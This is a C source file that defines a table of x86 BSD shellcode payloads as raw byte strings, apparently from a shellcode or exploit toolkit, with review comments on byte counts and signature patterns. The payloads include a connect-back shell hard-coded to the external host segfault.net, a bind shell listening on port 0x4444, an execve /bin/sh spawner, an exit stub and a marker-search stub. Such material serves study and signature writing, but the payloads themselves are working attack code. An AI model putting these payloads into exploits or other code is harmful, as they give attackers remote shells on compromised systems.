#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "shellcode.h"
#include "x86.h"
/*
 * Table entry "x86-bsd-spset".
 *
 * ATTENTION: this must be the first of the concatenated shellcodes, and the
 * last one must be terminated with x86_TERMINATOR.
 *
 * The initializer is positional: a name string, an integer, then the raw
 * bytes. The integer (20) equals the number of bytes in the literal below
 * (12 + 8), so it is presumably the payload length field of the `shellcode`
 * type -- confirm against shellcode.h, which is not shown here.
 * The count is maintained by hand; it has to be re-checked whenever the
 * literal is edited, because nothing in this file ties the two together.
 *
 * NOTE(review): the bytes start with the little-endian constant 0x12345678
 * (78 56 34 12). This looks like a marker value -- verify its meaning
 * against x86.h before relying on it.
 */
shellcode x86_bsd_spset = {
"x86-bsd-spset",
20,
"\xb8\x78\x56\x34\x12\x99\xb6\x02\x5b\x53\x44\x4a"
"\x74\x06\x39\xc3\x74\xf3\xeb\xf4"
};
/*
 * Table entry "x86-bsd-connectsh".
 *
 * ATTENTION: connects to segfault.net at the moment.
 *
 * The destination is not a parameter of this table: it is whatever the byte
 * string below encodes, so the entry is tied to a third-party host.
 * The integer (66) equals the number of bytes in the literal (5 * 12 + 6);
 * presumably the payload length -- confirm against shellcode.h.
 *
 * Recognisable content for reviewers and signature writers:
 *   - "\x66\x68\x44\x44": a 16-bit constant 0x4444, presumably the port
 *     (17476) -- TODO confirm;
 *   - the ASCII bytes "n/sh" (6e 2f 73 68) and "//bi" (2f 2f 62 69);
 *   - "\xcd\x80" (int 0x80) appears four times.
 */
shellcode x86_bsd_connectsh = {
"x86-bsd-connectsh",
66,
"\x31\xed\xf7\xe5\x55\x45\x55\x45\x55\xb0\x61\x55"
"\xcd\x80\x96\x68\xc3\x58\xb0\xca\x66\x68\x44\x44"
"\x66\x55\x89\xe7\x6a\x10\x57\x56\x56\x6a\x62\x58"
"\xcd\x80\x60\xb0\x5a\xcd\x80\x4d\x79\xf8\x52\x89"
"\xe3\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x60"
"\x5e\x5e\xb0\x3b\xcd\x80"
};
/*
 * Table entry "x86-bsd-portshellsh".
 *
 * The integer (73) equals the number of bytes in the literal below
 * (6 * 12 + 1); presumably the payload length -- confirm against
 * shellcode.h. The count is maintained by hand.
 *
 * Recognisable content for reviewers and signature writers:
 *   - "\x66\x68\x44\x44": the same 16-bit constant 0x4444 that appears in
 *     x86_bsd_connectsh, presumably the port (17476) -- TODO confirm;
 *   - the ASCII bytes "n/sh" (6e 2f 73 68) and "//bi" (2f 2f 62 69);
 *   - "\xcd\x80" (int 0x80) appears several times.
 */
shellcode x86_bsd_portshellsh = {
"x86-bsd-portshellsh",
73,
"\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53"
"\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5"
"\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a"
"\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a"
"\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73"
"\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd"
"\x80"
};
/*
 * Table entry "x86-bsd-execvesh".
 *
 * The integer (22) equals the number of bytes in the literal below
 * (12 + 10); presumably the payload length -- confirm against shellcode.h.
 *
 * The literal contains the ASCII bytes "n/sh" (6e 2f 73 68) and "//bi"
 * (2f 2f 62 69) and ends with "\xcd\x80" (int 0x80). The same 18-byte tail
 * pattern around those strings also appears in x86_bsd_connectsh and
 * x86_bsd_portshellsh, which makes it a useful common signature.
 */
shellcode x86_bsd_execvesh = {
"x86-bsd-execvesh",
22,
"\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68"
"\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80"
};
/*
 * Table entry "x86-bsd-exit".
 *
 * The integer (5) equals the number of bytes in the literal below;
 * presumably the payload length -- confirm against shellcode.h.
 * The bytes are 31 c0 40 (eax cleared, then incremented to 1) followed by
 * cd 80 (int 0x80).
 */
shellcode x86_bsd_exit = {
"x86-bsd-exit",
5,
"\x31\xc0\x40\xcd\x80"
};
/*
 * NULL-terminated list of pointers to the five x86/BSD entries defined in
 * this file. The trailing NULL is the only end marker visible here, so
 * consumers presumably walk the list until they reach it -- verify against
 * the code that reads `arch` records.
 *
 * NOTE(review): x86_bsd_connectsh is part of this list, and per its own
 * comment it carries a hard-coded third-party destination.
 */
shellcode * x86_bsd_shellcodes[] = {
&x86_bsd_execvesh, /* TODO: add other shellcodes here */
&x86_bsd_exit,
&x86_bsd_portshellsh,
&x86_bsd_connectsh,
&x86_bsd_spset,
NULL,
};
/*
 * Architecture record "x86-bsd".
 *
 * Positional initializer: a name string, the integer 1, x86_nop, and the
 * x86_bsd_shellcodes list above. x86_nop is not defined in this file
 * (presumably declared in x86.h). The meaning of the integer 1 cannot be
 * read from this file -- TODO confirm against the `arch` definition in
 * shellcode.h.
 */
arch x86_bsd = {
"x86-bsd",
1,
x86_nop,
x86_bsd_shellcodes,
};